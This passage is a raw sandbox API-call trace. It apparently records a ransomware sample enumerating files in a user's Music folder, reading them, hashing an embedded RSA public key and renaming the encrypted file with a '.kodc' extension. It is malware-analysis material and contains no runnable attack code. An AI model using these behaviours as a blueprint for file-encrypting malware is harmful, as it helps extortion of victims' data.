returned 0x9bb81d8 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.869] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb81f0 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb81d8 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.870] GetCurrentThreadId () returned 0x42c [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8ae8 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.871] GetCurrentThreadId () returned 0x42c [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8208 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81c0 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb6508 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x6c16, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x6c16, lpOverlapped=0x0) returned 1 [0101.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0101.875] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6c1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.875] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.876] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.876] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.882] CloseHandle (hObject=0x5cc) returned 1 [0101.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.885] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\3nhftNJqbGrzTJO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\3nhftnjqbgrztjo.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\3nhftNJqbGrzTJO.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\3nhftnjqbgrztjo.m4a.kodc")) returned 1 [0101.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.886] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.887] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27b54300, ftCreationTime.dwHighDateTime=0x1d5c3c2, ftLastAccessTime.dwLowDateTime=0xa0ab60a0, ftLastAccessTime.dwHighDateTime=0x1d5c12e, ftLastWriteTime.dwLowDateTime=0xa0ab60a0, ftLastWriteTime.dwHighDateTime=0x1d5c12e, nFileSizeHigh=0x0, nFileSizeLow=0x9d66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4q5bCCZXK.m4a", cAlternateFileName="4Q5BCC~1.M4A")) returned 1 [0101.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.887] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\4q5bCCZXK.m4a") returned=".m4a" [0101.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\4q5bCCZXK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\4q5bcczxk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.888] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=40294) returned 1 [0101.888] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.891] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9d40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.891] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.892] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.892] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x9d66, lpOverlapped=0x0) returned 1 [0101.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.893] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.894] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.894] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.894] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.894] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.894] GetLastError () returned 0x0 [0101.894] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.894] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.894] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.894] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.894] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.894] 